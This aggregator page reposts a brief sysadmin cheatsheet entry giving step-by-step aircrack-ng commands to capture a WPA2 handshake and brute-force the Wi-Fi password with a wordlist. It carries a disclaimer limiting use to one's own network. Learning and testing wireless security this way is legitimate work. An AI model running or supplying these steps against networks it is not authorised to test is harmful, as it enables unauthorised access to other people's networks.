RSS Amplifier

My Sysadmin Cheatsheet · Aug 4, 2016

Crack WPA2 WLAN Password with aircrack-ng

0
Sign in to vote or save

docs.j7k6.org

05 Aug 2016


Disclaimer: This might be illegal in some countries. Perform this attack on your own network only!

  1. Put WLAN device into monitoring mode:
    airmon-ng start wlan0
    
  2. Scan for access points:
    airodump-ng wlan0mon
    
  3. Capture WPA2 handshake (use <$BSSID> and <$CHANNEL> from the previous scan):
    airodump-ng -c <$CHANNEL> --bssid <$BSSID> -w <$CAPTURE_FILE> wlan0mon
    
  4. Wait until airodump says ‘WPA handshake: …’ in the upper right of the terminal, then press Ctrl+c to stop scanning.
  5. Bruteforce the WPA2 handshake with aircrack-ng and a wordlist:
    aircrack-ng <$CAPTURE_FILE>-01.cap  -w <$WORDLIST_FILE>
    

Read the original on docs.j7k6.org

Comments

Nothing yet. Say the first thing.

    Sign in to join the conversation.